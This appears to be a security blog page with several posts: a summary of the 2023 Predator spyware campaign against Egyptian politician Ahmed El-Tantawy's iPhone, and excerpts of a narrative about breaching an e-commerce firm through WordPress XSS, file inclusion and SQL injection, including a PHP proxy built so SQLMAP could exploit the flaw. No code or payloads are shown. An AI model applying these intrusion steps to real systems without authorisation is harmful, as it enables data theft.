A dirty smell in an Egyptian politician's iPhone

This happened in Egypt. Ahmed El-Tantawy, a former member of the Egyptian parliament who decided to run in the upcoming Egyptian presidential election of 2024, had his mobile phone hacked. This was not the first time El-Tantawy’s phone had been hacked.

In this write-up I will try to simplify as much as possible what happened to Ahmed El-Tantawy’s iPhone and how it came to be compromised.
All the information mentioned here is gathered from the references listed at the end of this page.

Institutions

I will mention a few institutions and individuals who are involved in the hacking attempt, either directly or indirectly.

  • Cytrox: A company established in 2017 that makes malware used for cyberattacks and covert surveillance.
    The company was established by an Israeli cyber security engineer called “Rotem Farkash”, who served for years in the IDF (Israel Defense Forces), according to the Crunchbase website.
  • Predator: A spyware developed by Cytrox that targets the Android and iOS operating systems.
  • CitizenLab: Citizen Lab is a laboratory based at the Munk School of Global Affairs at the University of Toronto, Canada. The lab focuses on the study of digital threats to civil society and on high-level policy engagement.
  • TAG: Google’s Threat Analysis Group is a dedicated team that analyzes and monitors the attacks of malicious actors and is responsible for patching published and newly discovered vulnerabilities.
  • Egypt: Represents the Egyptian government and the decision makers behind the actions taken in the field of cyber security.
  • Ayman Nour: A former member of the Egyptian political opposition living in exile in Turkey.
  • Ahmed El-Tantawy: A former Egyptian member of Parliament who previously served as chairman of an Egyptian opposition political party called “al-Karama”.
  • Apple: The well-known company that creates iPhones, iPads, Apple Watches and many other products, including its famous operating system iOS.
  • Vodafone: A British multinational telecommunications company that operates in multiple countries around the world including Egypt.

Timeline

The below list includes the timeline of the events:

  • 15 Sep 2021: Tantawy’s iPhone was infected through an SMS containing a Predator spyware download URL.
  • May 2023: Tantawy receives a malicious SMS containing a Predator spyware download URL.
  • 24 June 2023: Tantawy receives a malicious WhatsApp message containing a Predator spyware download URL.
  • 12 July 2023: Tantawy receives another malicious WhatsApp message containing a Predator spyware download URL.
  • September 2023: Tantawy receives another malicious SMS containing a Predator spyware download URL.
  • August – September 2023: Tantawy’s personal iPhone was targeted with a network injection attack that originated from the Egyptian Vodafone network.
  • September 2023: Tantawy suspects his phone has been hacked and turns to Citizen Lab to request a forensic investigation of his phone.
  • September 2023: Citizen Lab investigates Tantawy’s iPhone and reports all the discovered attack scenarios and CVEs, attributing the attack to the Egyptian government with high confidence.
  • September 2023: Citizen Lab reports to Apple three zero-days that were used and discovered during their investigation of Tantawy’s iPhone.
  • 5 September: TAG fixes a zero-day used by Predator spyware against Android devices, which was separately reported to the Chrome vulnerability rewards program by a security researcher.
  • 21 September 2023: Apple pushes a new iOS update that fixes the three zero-days used by Predator spyware and reported by Citizen Lab.


Remote Operation until last access (Part 2)

In Part 1, I outlined how, during this operation, I discovered an outdated WordPress installation. I researched the plugins and the theme that were installed on the WordPress site and obtained reflected XSS, a partial Local File Include, and time-based SQL injection.

If this were a normal pentest, this would be the end: I would write up the findings and recommendations. However, this was a remote operation. I was assessing a large corporation I am calling Target Corporate.

SQL Injection Exploitation

In Part 1, I used a Local File Include that turned out to be useful for including a page vulnerable to SQL injection, and I also created a PoC for the SQL injection. In this part, I will explain how the time-based SQL injection was exploited.

I used the SQLMAP tool, but the vulnerability could not be exploited directly by SQLMAP, so I had to create a PHP page that acts as a proxy between SQLMAP and the vulnerable page and provides the injection point that SQLMAP uses to launch a successful exploitation.

The PHP page is hosted on my localhost. It contains a user input called $inj that is used to pass the SQL injection payloads to the targeted vulnerable input in the proper form; I made it exploitable so that SQLMAP could inject its time-based SQL injection payloads.


Remote Operation until last access (Part 1)

In this post, I will chronicle a remote operation that was executed. The operation took many weeks to achieve its target: I went from minimal information about the corporation to the total compromise of all customers’ private information. The target is a large corporation with a sizable security program. For the purposes of this blog, I will call them Target Corporate.

Target Corporate is a big e-commerce company that operates in multiple countries. In this operation, I needed to do web application recon, source code review, exploitation, lateral movement and social engineering.

Let’s start

When I began this operation, I knew nothing about their infrastructure operations. I needed to research the corporation and learn as much about their internal operations as possible.

I needed to look for outdated software and services that could be exploited, maybe some applications with default passwords or custom web applications that might be vulnerable, and for any resources that might be useful for gaining more information.

Recon Phase

I spent hours doing recon on the target’s external systems. There were no obvious exploitable vulnerabilities on any of the applications that were discovered. I found numerous web services and spent time investigating them. There was nothing in these tiny services.

I used the Google search engine in addition to multiple tools to enumerate any reachable subdomains of Target Corporate; the most interesting subdomains were:

  • management.target.com (software to control customer data and transactions)
  • gmail.target.com (software backed by Google Mail to provide a secure email login)
  • wordpress.target.com (WordPress software installed)

(Those are not the real names of the subdomains.)
